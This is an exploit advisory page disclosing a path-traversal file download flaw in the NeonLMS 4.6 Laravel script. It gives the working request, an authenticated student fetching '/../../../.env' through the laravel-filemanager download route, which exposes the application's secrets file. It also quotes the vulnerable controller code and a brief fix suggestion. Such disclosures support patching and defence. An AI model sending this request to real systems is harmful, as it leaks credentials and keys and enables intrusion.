NeonLMS - Learning Management System PHP Laravel Script - 'Arbitrary' File Download

2020.06.05

th3d1gger (TR)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: NeonLMS - Learning Management System PHP Laravel Script - 'Arbitrary' File Download
# Exploit Author: th3d1gger
# Google Dork: N/A
# Type: Web App
# Date: 2020-06-04
# Vendor Homepage: https://www.neonlms.com/
# Software Link: https://codecanyon.net/item/neonlms-learning-management-system-php-laravel-script/23641351
# Affected Version: 4.6
# Tested on: Windows
# CVE : N/A
#Vulnerable Request:
After Authentication as student,
browse https://neonlmshost/laravel-filemanager/download?file=/../../../.env
#Vulnerable code
\vendor\unisharp\laravel-filemanager\src\Controllers\DownloadController.php
public function getDownload()
{
return response()->download(parent::getCurrentPath(request('file')));
}
#fix
maybe devteam can use "auth user role check" in that function.
or can update it.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

NeonLMS - Learning Management System PHP Laravel Script - 'Arbitrary' File Download

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.